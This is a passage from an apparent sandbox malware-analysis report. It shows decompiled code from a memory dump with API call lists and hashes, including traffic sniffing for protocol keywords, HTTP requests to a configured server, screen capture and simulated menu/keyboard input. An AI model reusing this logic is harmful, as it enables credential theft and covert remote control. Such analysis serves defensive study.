    					__eflags = _t80;
    					if(_t80 == 0) {
    						goto L1;
    					}
    					__esi[4] = _t80;
    					__esi[6] = _t80 + 0x128;
    					_v9 = 0;
    					_t82 = GetDC(0);
    					_v16 = _t82;
    					__eflags = _t82;
    					if(_t82 == 0) {
    						L22:
    						return _v9;
    					}
    					__esi[9] = 0;
    					__esi[0xa] = 0;
    					__esi[0xb] = GetDeviceCaps(_t82, 8);
    					_t85 = GetDeviceCaps(_v16, 0xa);
    					_t118 = __esi[0xb];
    					__esi[0xc] = _t85;
    					__eflags = CreateCompatibleBitmap(_v16, __esi[0xb], _t85);
    					if(__eflags == 0) {
    						_t87 = 0;
    						__eflags = 0;
    					} else {
    						_t24 =  &(_t124[8]); // 0x423e98
    						_t87 = E00417F5F(_t118, _t120, __eflags, _v16,  &_v20, _t24, 0, 0, _t86);
    					}
    					_t124[7] = _t87;
    					ReleaseDC(0, _v16);
    					__eflags = _t124[7];
    					if(_t124[7] != 0) {
    						_t119 = _v20;
    						_t90 =  *(_v20 + 0xe) >> 3;
    						_t124[0xe] = _t90;
    						_t92 = (_t90 & 0x000000ff) * _t124[0xb];
    						_t124[0xd] = _t92;
    						__eflags = _t92 & 0x00000003;
    						if((_t92 & 0x00000003) != 0) {
    							_t92 = (_t92 & 0xfffffffc) + 4;
    							__eflags = _t92;
    						}
    						_t124[0xd] = _t92;
    						E004119C1(_t119);
    						__eflags = _a4 - 1;
    						_v9 = 1;
    						if(_a4 != 1) {
    							goto L22;
    						}
    						_v9 = 0;
    						E004065EC( &_v1576);
    						E00406619(_t119,  &_v616);
    						_t43 =  &(_t124[0xf]); // 0x423eb4
    						E004119FD(_t43, 0x4227a8, 0x10);
    						_t124[0x13] = _v138;
    						_t47 =  &(_t124[0x14]); // 0x423ec8
    						E004119FD(_t47,  &_v1126, 0x102);
    						E00406312(0x1898b122,  &_v128, 1);
    						_t107 = CreateMutexW(0x422568, 0,  &_v128);
    						_t124[0x58] = _t107;
    						__eflags = _t107;
    						if(_t107 == 0) {
    							goto L1;
    						}
    						_t108 = GetDC(0);
    						_a4 = _t108;
    						__eflags = _t108;
    						if(_t108 != 0) {
    							_t109 = CreateCompatibleDC(_t108);
    							_t124[0x55] = _t109;
    							__eflags = _t109;
    							if(_t109 != 0) {
    								_t111 = CreateCompatibleBitmap(_a4, 1, 1);
    								_t124[0x57] = _t111;
    								__eflags = _t111;
    								if(_t111 != 0) {
    									_t112 = SelectObject(_t124[0x55], _t111);
    									_t124[0x56] = _t112;
    									__eflags = _t112;
    									if(_t112 != 0) {
    										_v9 = 1;
    									}
    								}
    							}
    							ReleaseDC(0, _a4);
    						}
    					}
    					goto L22;
    				}
    				L1:
    				return 0;
    			}

    APIs
    • TlsAlloc.KERNEL32(00423E78,00000000,0000018C,00000000,00000000), ref: 0041A76F
    • RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0041A797
    • CreateEventW.KERNEL32(00422568,00000001,00000000,?,84889912,?,00000001), ref: 0041A7C1
    • CreateMutexW.KERNEL32(00422568,00000000,?,18782822,?,00000001), ref: 0041A7E4
    • CreateFileMappingW.KERNEL32(00000000,00422568,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0041A80F
    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0041A825
    • GetDC.USER32(00000000), ref: 0041A842
    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0041A862
    • GetDeviceCaps.GDI32(?,0000000A), ref: 0041A86C
    • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0041A87F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Create$CapsDeviceFile$AllocBitmapCompatibleEventMappingMessageMutexRegisterViewWindow
    • String ID: h%B
    • API String ID: 3765073151-3383014353
    • Opcode ID: 13ef53d0e043e59d6c065c42b1b45e5cf2978eb8131bc60b31dc1b7fe6975350
    • Instruction ID: 105e1555d395346a070a0585ca0fc60117ec0de6a6961ac548d13e7e22b2645c
    • Opcode Fuzzy Hash: 13ef53d0e043e59d6c065c42b1b45e5cf2978eb8131bc60b31dc1b7fe6975350
    • Instruction Fuzzy Hash: AF7150B1900644AFDB209FB0CD89EEBB7FCEB08304F10482EF952E6251D67999988F15
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E00409FC5(void* __eax, signed int* __ecx, signed int __edx, intOrPtr _a4) {
    				char _v536;
    				char _v652;
    				char _v664;
    				char _v696;
    				char _v700;
    				char _v701;
    				char _v708;
    				void* __esi;
    				char* _t35;
    				void* _t40;
    				char* _t43;
    				intOrPtr _t44;
    				void* _t47;
    				void* _t54;
    				void* _t56;
    				intOrPtr _t57;
    				signed int _t58;
    				signed int _t60;
    				void* _t61;
    				signed int* _t71;
    				intOrPtr _t73;
    				signed int _t75;
    				signed char _t76;
    				intOrPtr _t79;
    				signed int _t80;
    				intOrPtr _t83;
    				signed int* _t84;
    				intOrPtr _t85;
    				void* _t87;
    				char* _t92;
    				void* _t93;
    				intOrPtr* _t94;
    
    				_t80 = __edx;
    				_t87 = __eax;
    				_t71 = __ecx;
    				if(_a4 == 0xffffffff || __ecx == 0 || __eax > 0x200) {
    					L51:
    					_t35 = 0;
    					__eflags = 0;
    				} else {
    					if(__eax <= 6) {
    						L24:
    						__eflags = _t87 - 1;
    						if(_t87 <= 1) {
    							goto L51;
    						} else {
    							EnterCriticalSection(0x422a50);
    							_t83 = E00409EBD(_a4);
    							__eflags = _t83;
    							if(_t83 != 0) {
    								__eflags =  *((intOrPtr*)(_t83 + 4));
    								if( *((intOrPtr*)(_t83 + 4)) == 0) {
    									L48:
    									_push(0);
    									goto L49;
    								} else {
    									__eflags =  *((intOrPtr*)(_t83 + 8));
    									if( *((intOrPtr*)(_t83 + 8)) == 0) {
    										goto L48;
    									} else {
    										__eflags = _t87 - 3;
    										if(_t87 < 3) {
    											L33:
    											__eflags = _t87 - 4;
    											if(_t87 >= 4) {
    												_t75 =  *_t71 ^ 0x03030303;
    												__eflags = _t75 - 0x46535a57;
    												if(_t75 == 0x46535a57) {
    													goto L37;
    												} else {
    													__eflags = _t75 - 0x57424645;
    													if(_t75 == 0x57424645) {
    														goto L37;
    													} else {
    														__eflags = _t75 - 0x55504253;
    														if(_t75 != 0x55504253) {
    															__eflags = _t75 - 0x57425750;
    															if(_t75 == 0x57425750) {
    																L40:
    																_t76 = 0x65;
    																_push(0x15);
    																goto L41;
    															} else {
    																__eflags = _t75 - 0x57504a4f;
    																if(_t75 == 0x57504a4f) {
    																	goto L40;
    																}
    															}
    														} else {
    															goto L37;
    														}
    													}
    												}
    											}
    										} else {
    											_t58 =  *_t71;
    											__eflags = _t58 - 0x43;
    											if(_t58 == 0x43) {
    												L31:
    												__eflags = _t71[0] - 0x57;
    												if(_t71[0] != 0x57) {
    													goto L33;
    												} else {
    													__eflags = _t71[0] - 0x44;
    													if(_t71[0] == 0x44) {
    														L37:
    														_t76 = 0x64;
    														_push(0x14);
    														L41:
    														_pop(_t40);
    														E00419DD3(_t40,  &_v696);
    														_t43 =  &_v652;
    														_v700 = 0x80;
    														__imp__#5(_a4, _t43,  &_v700);
    														__eflags = _t43;
    														if(_t43 == 0) {
    															_t78 =  &_v664;
    															_t44 = E00414E6B( &_v664);
    															__eflags = _t44;
    															if(_t44 == 0) {
    																__eflags = _t76 - 0x65;
    																if(_t76 == 0x65) {
    																	L46:
    																	E00414E22( &_v664, _t78,  &_v536);
    																	_t47 = 0x13;
    																	E00419DD3(_t47,  &_v696);
    																	_push( &_v536);
    																	_push( *((intOrPtr*)(_t83 + 8)));
    																	_push( *((intOrPtr*)(_t83 + 4)));
    																	E0040BA61(_t78, _t80, __eflags, _t76 & 0x000000ff, 0, 0,  &_v696,  &_v708);
    																} else {
    																	__eflags = _t76 - 0x64;
    																	if(_t76 == 0x64) {
    																		_t92 =  &_v696;
    																		_t54 = 0x16;
    																		E00419DD3(_t54, _t92);
    																		_push( *((intOrPtr*)(_t83 + 4)));
    																		_t80 = _t80 | 0xffffffff;
    																		_t56 = 9;
    																		_t78 = _t92;
    																		_t57 = E004125D1(_t56, _t92, _t80);
    																		__eflags = _t57;
    																		if(_t57 != 0) {
    																			goto L46;
    																		}
    																	}
    																}
    															}
    														}
    														_push(0);
    														L49:
    														E00409F5C(_t83);
    													} else {
    														goto L33;
    													}
    												}
    											} else {
    												__eflags = _t58 - 0x50;
    												if(_t58 != 0x50) {
    													goto L33;
    												} else {
    													goto L31;
    												}
    											}
    										}
    									}
    								}
    							}
    							_t73 = 0;
    							goto L23;
    						}
    					} else {
    						_t60 =  *__ecx ^ 0x03030303;
    						if(_t60 == 0x51465056 || _t60 == 0x50504253) {
    							if(_t71[1] != 0x20) {
    								goto L24;
    							} else {
    								_t61 = 0;
    								_t93 = _t87 + 0xfffffffb;
    								_t84 =  &(_t71[1]);
    								if(_t93 == 0) {
    									goto L51;
    								} else {
    									while(1) {
    										_t79 =  *((intOrPtr*)(_t61 + _t84));
    										if(_t79 == 0xd || _t79 == 0xa) {
    											break;
    										}
    										if(_t79 < 0x20) {
    											goto L51;
    										} else {
    											_t61 = _t61 + 1;
    											if(_t61 < _t93) {
    												continue;
    											} else {
    												break;
    											}
    										}
    										goto L52;
    									}
    									if(_t61 == 0 || _t61 == _t93) {
    										goto L51;
    									} else {
    										_t85 = E00411C01(_t61, 0xfde9, _t84);
    										if(_t85 == 0) {
    											goto L51;
    										} else {
    											_v701 = 0;
    											EnterCriticalSection(0x422a50);
    											_t94 = E00409EBD(_a4);
    											if(_t94 != 0) {
    												L18:
    												__eflags =  *_t71 - 0x55;
    												_v701 = 1;
    												if( *_t71 != 0x55) {
    													E004119C1( *((intOrPtr*)(_t94 + 8)));
    													 *((intOrPtr*)(_t94 + 8)) = _t85;
    												} else {
    													E00409F5C(_t94, 1);
    													 *((intOrPtr*)(_t94 + 4)) = _t85;
    												}
    												 *_t94 = _a4;
    											} else {
    												_t94 = E00409EF6(_a4);
    												if(_t94 != 0) {
    													goto L18;
    												} else {
    													E004119C1(_t85);
    												}
    											}
    											_t73 = _v701;
    											L23:
    											LeaveCriticalSection(0x422a50);
    											_t35 = _t73;
    										}
    									}
    								}
    							}
    						} else {
    							goto L24;
    						}
    					}
    				}
    				L52:
    				return _t35;
    			}

    APIs
    • EnterCriticalSection.KERNEL32(00422A50,0000FDE9,?), ref: 0040A07A
    • LeaveCriticalSection.KERNEL32(00422A50,?,000000FF), ref: 0040A0D5
    • EnterCriticalSection.KERNEL32(00422A50), ref: 0040A0F0
    • getpeername.WS2_32 ref: 0040A19D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$Enter$Leavegetpeername
    • String ID: $D$EFBW$OJPW$PWBW$SBPP$SBPU$U$VPFQ$W$WZSF
    • API String ID: 1099368488-646741861
    • Opcode ID: 766b80b776ba74df103d257565504e33cbc151f1c039a3cf0c4ccccf31bb89cf
    • Instruction ID: a2172be0ee197e82f8c3eec307670b5f574ae8a9cbacb4248be72086ddd4439c
    • Opcode Fuzzy Hash: 766b80b776ba74df103d257565504e33cbc151f1c039a3cf0c4ccccf31bb89cf
    • Instruction Fuzzy Hash: 7D512332A04305AADF309A24CC417AB77D4AB46314F18457BE994BB3D2C73E8DA1978F
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004193F1(intOrPtr* _a4) {
    				char _v532;
    				void* _v536;
    				short _v540;
    				char* _v552;
    				void* _v568;
    				char _v570;
    				char _v572;
    				char _v576;
    				char* _v580;
    				void* _v592;
    				char _v596;
    				char _v600;
    				void* _v620;
    				void* _v624;
    				void* _v628;
    				char* _v632;
    				long _v648;
    				void _v652;
    				intOrPtr _v656;
    				char _v668;
    				intOrPtr _v672;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t53;
    				void* _t56;
    				intOrPtr _t58;
    				void* _t63;
    				void* _t67;
    				void* _t94;
    				void* _t99;
    				char* _t101;
    				intOrPtr* _t109;
    				void* _t113;
    				intOrPtr* _t114;
    				signed int _t120;
    				void* _t122;
    
    				_t122 = (_t120 & 0xfffffff8) - 0x224;
    				_t109 = _a4;
    				if(E0041641F( &_v532,  *((intOrPtr*)(_t109 + 4))) == 0) {
    					L25:
    					return 0;
    				}
    				_t53 = InternetOpenA( *0x4227a4, 0, 0, 0, 0);
    				_v536 = _t53;
    				if(_t53 == 0) {
    					L24:
    					E004119C1(_v552);
    					E004119C1(_v552);
    					goto L25;
    				}
    				_t56 = InternetConnectA(_t53, _v552, _v540, 0, 0, 3, 0, 0);
    				_v592 = _t56;
    				if(_t56 == 0) {
    					L23:
    					InternetCloseHandle(_v568);
    					goto L24;
    				}
    				_t58 =  *_t109;
    				_t101 = "POST";
    				if( *((char*)(_t58 + 0x18)) != 1) {
    					_t101 = "GET";
    				}
    				_t99 = HttpOpenRequestA(_v592, _t101, _v580, "HTTP/1.1",  *(_t58 + 8), 0, (0 | _v570 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
    				_v620 = _t99;
    				if(_t99 == 0) {
    					L22:
    					InternetCloseHandle(_v624);
    					goto L23;
    				} else {
    					E00406619(_t101,  &_v576);
    					_t63 = 0xe;
    					E00419D9D(_t63,  &_v600);
    					_t66 =  *_a4;
    					if( *((intOrPtr*)( *_a4 + 0x20)) > 0) {
    						_t94 = E00412785( &_v632,  &_v600,  *((intOrPtr*)(_t66 + 0x1c)));
    						_t122 = _t122 + 0xc;
    						if(_t94 > 0) {
    							HttpAddRequestHeadersA(_t99, _v632, 0xffffffff, 0xa0000000);
    							E004119C1(_v648);
    						}
    					}
    					_t67 = 0xf;
    					E00419D9D(_t67,  &_v596);
    					_v628 = E00412510( &_v572);
    					_t113 = E00411991(2 + _t69 * 6);
    					if(_t113 == 0) {
    						_t113 = 0;
    					} else {
    						E0041674A(_t113,  &_v572, _v628);
    						_t99 = _v628;
    					}
    					if(_t113 != 0 && E00412785( &_v632,  &_v596, _t113) > 0) {
    						HttpAddRequestHeadersA(_t99, _v632, 0xffffffff, 0xa0000000);
    						E004119C1(_v648);
    					}
    					E004119C1(_t113);
    					_t114 = _a4;
    					if(HttpSendRequestA(_t99, 0, 0,  *( *_t114 + 0x24),  *( *_t114 + 0x28)) != 1) {
    						L21:
    						InternetCloseHandle(_t99);
    						goto L22;
    					} else {
    						_v648 = 4;
    						_v652 = 0;
    						if(HttpQueryInfoA(_t99, 0x20000013,  &_v652,  &_v648, 0) != 1 || _v672 != 0xc8) {
    							goto L21;
    						} else {
    							if(E00413AF7( &_v668, _t99) != 0) {
    								E004119C1(_t80);
    							}
    							E004119C1(_v656);
    							E004119C1(_v656);
    							 *((intOrPtr*)(_t114 + 8)) = _v668;
    							goto L25;
    						}
    					}
    				}
    			}

    APIs
      • Part of subcall function 0041641F: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 0041644E
    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 00419423
    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00419444
    • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 00419493
    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 004194EA
    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00419562
    • HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00419585
    • HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 004195AD
    • InternetCloseHandle.WININET(00000000), ref: 004195F2
    • InternetCloseHandle.WININET(?), ref: 004195FC
      • Part of subcall function 00413AF7: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 00413B0B
      • Part of subcall function 00413AF7: GetLastError.KERNEL32 ref: 00413B15
      • Part of subcall function 00413AF7: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 00413B35
      • Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4
    • InternetCloseHandle.WININET(?), ref: 00419606
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Internet$Http$Request$CloseHandleQuery$HeadersOpenOption$ConnectCrackErrorFreeHeapInfoLastSend
    • String ID: GET$HTTP/1.1$POST
    • API String ID: 1023423486-2753618334
    • Opcode ID: c770ea861898683855c7a6f19055910d428729f9ffbba96d0357c90297ee6560
    • Instruction ID: f545488242c0e7ae169259ad064fd0a74c260ea46216053250fcd51dbe664e74
    • Opcode Fuzzy Hash: c770ea861898683855c7a6f19055910d428729f9ffbba96d0357c90297ee6560
    • Instruction Fuzzy Hash: 5F51D2B2008201BBC711AF61DD95ECFBFA9FF84354F00092AF585A2172D739DA85CB99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E0041AC8D(unsigned int __ecx, struct HWND__* _a4, signed short _a8) {
    				struct tagRECT _v20;
    				signed int _v24;
    				signed int _v28;
    				signed short _t37;
    				int _t46;
    				BYTE* _t47;
    				signed short _t51;
    				int _t63;
    				int _t64;
    				unsigned int _t65;
    				struct HMENU__* _t70;
    				struct HMENU__* _t74;
    				void* _t78;
    
    				_t65 = __ecx;
    				_t37 = _a8;
    				_t78 = _t37 - 0xfffffffd;
    				if(_t78 == 0) {
    					SetKeyboardState( *0x423e88);
    					L23:
    					SetEvent( *0x423e84);
    					return 0;
    				}
    				if(_t78 <= 0 || _t37 > 0xffffffff) {
    					_v20.top = _t37 >> 0x10;
    					_v20.right = _t65 & 0x0000ffff;
    					_v20.left = _t37 & 0x0000ffff;
    					_v20.bottom = _t65 >> 0x10;
    					E0040BC64( &_v20, _t65 >> 0x10, _t37 & 0x0000ffff, 0x423e78, _a4, 0);
    					goto L23;
    				} else {
    					_t70 = GetMenu(_a4);
    					if(_t70 == 0) {
    						goto L23;
    					}
    					_v24 = _v24 | 0xffffffff;
    					_t46 = GetMenuItemCount(_t70);
    					_t63 = 0;
    					_v28 = _t46;
    					if(_t46 <= 0) {
    						L8:
    						_t47 =  *0x423e88;
    						_push(_t47[0x104]);
    						_t64 = MenuItemFromPoint(_a4, _t70, _t47[0x100]);
    						if(_t64 == 0xffffffff) {
    							goto L23;
    						}
    						_v28 = GetMenuState(_t70, _t64, 0x400);
    						if(_v24 != _t64) {
    							EndMenu();
    						}
    						HiliteMenuItem(_a4, _t70, _t64, 0x480);
    						if(_a8 != 0xfffffffe && (_v28 & 0x00000003) == 0) {
    							if((_v28 & 0x00000010) == 0) {
    								if((_v28 & 0x00000800) == 0) {
    									_t51 = GetMenuItemID(_t70, _t64);
    									if(_t51 == 0xffffffff) {
    										goto L23;
    									}
    									L20:
    									SendMessageW(_a4, 0x111, _t51 & 0x0000ffff, 0);
    									goto L23;
    								}
    								_t51 = 0;
    								goto L20;
    							}
    							_t74 = GetSubMenu(_t70, _t64);
    							if(_t74 != 0 && GetMenuItemRect(_a4, _t70, _t64,  &_v20) != 0) {
    								TrackPopupMenuEx(_t74, 0x4000, _v20, _v20.bottom, _a4, 0);
    							}
    						}
    						goto L23;
    					} else {
    						goto L5;
    					}
    					do {
    						L5:
    						if(GetMenuState(_t70, _t63, 0x400) < 0) {
    							HiliteMenuItem(_a4, _t70, _t63, 0x400);
    							_v24 = _t63;
    						}
    						_t63 = _t63 + 1;
    					} while (_t63 < _v28);
    					goto L8;
    				}
    			}

    APIs
    • GetMenu.USER32(?), ref: 0041ACB7
    • GetMenuItemCount.USER32 ref: 0041ACCD
    • GetMenuState.USER32 ref: 0041ACE5
    • HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 0041ACF5
    • MenuItemFromPoint.USER32(?,00000000,?,?), ref: 0041AD1B
    • GetMenuState.USER32 ref: 0041AD2F
    • EndMenu.USER32 ref: 0041AD3F
    • HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 0041AD4F
    • GetSubMenu.USER32 ref: 0041AD73
    • GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 0041AD8D
    • TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 0041ADAE
    • GetMenuItemID.USER32(00000000,00000000), ref: 0041ADC6
    • SendMessageW.USER32(?,00000111,?,00000000), ref: 0041ADDF
    • SetKeyboardState.USER32 ref: 0041AE1E
    • SetEvent.KERNEL32 ref: 0041AE2A
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Menu$Item$State$Hilite$CountEventFromKeyboardMessagePointPopupRectSendTrack
    • String ID:
    • API String ID: 751066993-0
    • Opcode ID: a847ba1574b71e080fff676a69488b28f9980bbbdcc4d8c6077a4200fc427fd2
    • Instruction ID: d8f35a2babeee9c044b84aee02200fdd2ad94d7237bf8c1a4937a5c31f97ac84
    • Opcode Fuzzy Hash: a847ba1574b71e080fff676a69488b28f9980bbbdcc4d8c6077a4200fc427fd2
    • Instruction Fuzzy Hash: B441E130101305AFD7118F25ED88AAB7BF8FB44769F00062AF855A11F1C7388DA5DB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004156A7() {
    				struct HINSTANCE__* _t2;
    				_Unknown_base(*)()* _t7;
    				void* _t9;
    				intOrPtr _t18;
    
    				if( *0x423c68 != 0) {
    					L9:
    					 *0x423c68 =  *0x423c68 + 1;
    					return 1;
    				} else {
    					_t2 = LoadLibraryA("cabinet.dll");
    					 *0x423c64 = _t2;
    					if(_t2 == 0) {
    						L8:
    						return 0;
    					} else {
    						 *0x423c50 = GetProcAddress(_t2, "FCICreate");
    						 *0x423c54 = GetProcAddress( *0x423c64, "FCIAddFile");
    						 *0x422e88 = GetProcAddress( *0x423c64, "FCIFlushCabinet");
    						_t7 = GetProcAddress( *0x423c64, "FCIDestroy");
    						 *0x423c5c = _t7;
    						if( *0x423c50 == 0 ||  *0x423c54 == 0) {
    							L7:
    							FreeLibrary( *0x423c64);
    							goto L8;
    						} else {
    							_t18 =  *0x422e88; // 0x0
    							if(_t18 == 0 || _t7 == 0) {
    								goto L7;
    							} else {
    								_t9 = HeapCreate(0, 0x80000, 0);
    								 *0x422e84 = _t9;
    								if(_t9 != 0) {
    									goto L9;
    								} else {
    									goto L7;
    								}
    							}
    						}
    					}
    				}
    			}

    APIs
    • LoadLibraryA.KERNEL32(cabinet.dll,00000000,0041578E,?,004159AA,?,?,00000000,?,?,?), ref: 004156BB
    • GetProcAddress.KERNEL32(00000000,FCICreate), ref: 004156DB
    • GetProcAddress.KERNEL32(FCIAddFile), ref: 004156ED
    • GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 004156FF
    • GetProcAddress.KERNEL32(FCIDestroy), ref: 00415711
    • HeapCreate.KERNEL32(00000000,00080000,00000000,004159AA,?,?,00000000,?,?,?), ref: 0041573C
    • FreeLibrary.KERNEL32(004159AA,?,?,00000000,?,?,?), ref: 00415751
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$Library$CreateFreeHeapLoad
    • String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
    • API String ID: 2040708800-1163896595
    • Opcode ID: 2fde2e746c1cf5345de20bc0d2a3812fe8f1f332dd93e431efc319d49cf00a78
    • Instruction ID: 20648e428f7e748b32fd24f78ae9bb7ae088a42e45250f0d9ce7d40ab6828e4d
    • Opcode Fuzzy Hash: 2fde2e746c1cf5345de20bc0d2a3812fe8f1f332dd93e431efc319d49cf00a78
    • Instruction Fuzzy Hash: 671130B2B40710EACB325F3AAD899A57FB5A3C47527A40537E410B2274DA7C4682DF0C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E00407F00(void* __edx, intOrPtr _a4, signed int _a8, signed char _a12) {
    				intOrPtr _v20;
    				void* _v24;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				void* _v44;
    				void* _v60;
    				signed int _v72;
    				char _v76;
    				signed int _v80;
    				signed int _v84;
    				signed char _v88;
    				signed int _v92;
    				void* _v96;
    				intOrPtr _v104;
    				signed int _v108;
    				void* _v112;
    				void* _v132;
    				void* __esi;
    				signed int _t111;
    				signed int _t113;
    				signed char _t114;
    				signed int _t115;
    				void* _t117;
    				signed char _t121;
    				signed int _t122;
    				signed int _t125;
    				signed int _t128;
    				signed char _t130;
    				signed char _t136;
    				intOrPtr _t149;
    				void* _t165;
    				signed char _t166;
    				void* _t172;
    				intOrPtr _t178;
    				signed int _t184;
    				void* _t186;
    				void* _t188;
    				signed int _t202;
    				signed int _t203;
    				signed int _t205;
    				void* _t207;
    
    				_t207 = (_t205 & 0xfffffff8) - 0x5c;
    				if(E00406473() == 0 || _a8 == 0 || _a12 <= 0) {
    					L9:
    					_t111 =  *0x42252c(_a4, _a8, _a12);
    					goto L10;
    				} else {
    					EnterCriticalSection(0x422a08);
    					_t192 = _a4;
    					_t184 = E00406F84(_a4);
    					_v84 = _t184;
    					if(_t184 == 0xffffffff) {
    						L8:
    						LeaveCriticalSection(0x422a08);
    						goto L9;
    					}
    					_t186 = _t184 * 0x38 +  *0x422a24;
    					if( *(_t186 + 0x20) > 0) {
    						L29:
    						_t113 =  *(_t186 + 0x24);
    						_t188 =  *(_t186 + 0x20) - _t113;
    						LeaveCriticalSection(0x422a08);
    						_t195 = _a4;
    						_t114 =  *0x42252c(_a4,  *((intOrPtr*)(_t186 + 0x1c)) + _t113, _t188);
    						_v88 = _t114;
    						__eflags = _t114 - 0xffffffff;
    						if(_t114 != 0xffffffff) {
    							EnterCriticalSection(0x422a08);
    							_t115 = E00406F84(_t195);
    							__eflags = _t115 - 0xffffffff;
    							if(_t115 != 0xffffffff) {
    								_t166 = _v88;
    								_t117 = _t115 * 0x38 +  *0x422a24;
    								__eflags = _t166 - _t188;
    								if(_t166 != _t188) {
    									 *((intOrPtr*)(_t117 + 0x24)) =  *((intOrPtr*)(_t117 + 0x24)) + _t166;
    									_t92 = _t117 + 0x28;
    									 *_t92 =  *(_t117 + 0x28) - 1;
    									__eflags =  *_t92;
    									_v88 = 1;
    								} else {
    									_t88 = _t117 + 0x1c; // -4336136
    									_v88 =  *(_t117 + 0x28);
    									E00411A74(E004119C1( *_t88), _t88, 0, 0x10);
    								}
    							} else {
    								_v88 = _v88 | _t115;
    								 *0x422a04(0xffffe890, 8);
    							}
    							LeaveCriticalSection(0x422a08);
    						}
    						L36:
    						_t111 = _v88;
    						L10:
    						return _t111;
    					}
    					if( *(_t186 + 8) > 0) {
    						L38:
    						LeaveCriticalSection(0x422a08);
    						_t197 = _a4;
    						_t121 =  *0x42252c(_a4, _a8, _a12);
    						_v88 = _t121;
    						__eflags = _t121 - 0xffffffff;
    						if(_t121 != 0xffffffff) {
    							EnterCriticalSection(0x422a08);
    							_t122 = E00406F84(_t197);
    							__eflags = _t122 - 0xffffffff;
    							if(_t122 != 0xffffffff) {
    								_t172 = _t122 * 0x38 +  *0x422a24;
    								_t178 =  *((intOrPtr*)(_t172 + 8));
    								__eflags = _v88 - _t178;
    								if(_v88 > _t178) {
    									E00407042(_t122);
    								} else {
    									 *((intOrPtr*)(_t172 + 8)) = _t178 - _v88;
    								}
    							} else {
    								_v88 = _v88 | _t122;
    								 *0x422a04(0xffffe890, 8);
    							}
    							LeaveCriticalSection(0x422a08);
    						}
    						goto L36;
    					}
    					_t125 = E00407478( &_v76, _t192, _a8, _a12);
    					_v92 = _t125;
    					if(_t125 != 0xffffffff) {
    						__eflags = _v72;
    						if(_v72 == 0) {
    							L37:
    							E00419364( &_v76);
    							_t128 = _v80 + _a12;
    							__eflags = _t128;
    							 *(_t186 + 8) = _t128;
    							goto L38;
    						}
    						_t130 = E00418A36( &_v76);
    						_v88 = _t130;
    						__eflags = _t130 & 0x00000001;
    						if((_t130 & 0x00000001) == 0) {
    							_v92 = 0;
    							_v88 = 0;
    							__eflags = _t130 & 0x00000002;
    							if(__eflags != 0) {
    								_t203 = E00411A14(__eflags, _a8, _a12);
    								 *(_t207 + 0x10) = _t203;
    								__eflags = _t203;
    								if(_t203 != 0) {
